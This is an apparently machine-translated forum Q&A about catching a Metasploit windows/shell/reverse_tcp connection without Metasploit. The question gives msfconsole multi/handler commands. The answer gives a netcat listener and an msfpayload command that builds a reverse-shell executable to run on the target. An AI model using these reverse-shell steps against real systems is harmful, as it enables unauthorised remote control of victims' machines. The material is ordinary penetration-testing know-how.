独立的多/处理程序reverse_tcp

时间:2015-11-06 09:35:11

标签: metasploit

抱歉我的英文。 使用metasploit我使用windows / shell / reverse_tcp有效负载为windows 7生成了一个漏洞。 然后我使用msfconsole等待连接:

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit

我已成功连接到Windows的命令行。 但是我需要在不使用metasploit的情况下进行连接。我找到了如何创建独立模块,但它只是用于漏洞利用。 我需要独立的多/处理程序reverse_tcp或只是侦听某个端口的代码,然后才能访问命令行。

1 个答案:

答案 0 :(得分:0)

我真的不知道你的约束/限制是什么 我的猜测是,你希望在没有安装metasploit的计算机上“接收shell”。
如果是这种情况,你可以使用 msfd metasploit守护进程安装在不同的计算机上)或简单的netcat,socat,...

您如何看待这一点:

  • 使用netcat在192.168.1.2上监听# nc -l -p 4444
  • 使用 shell_reverse_tcp 代替# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
  • 在目标
  • 上执行darkbird.exe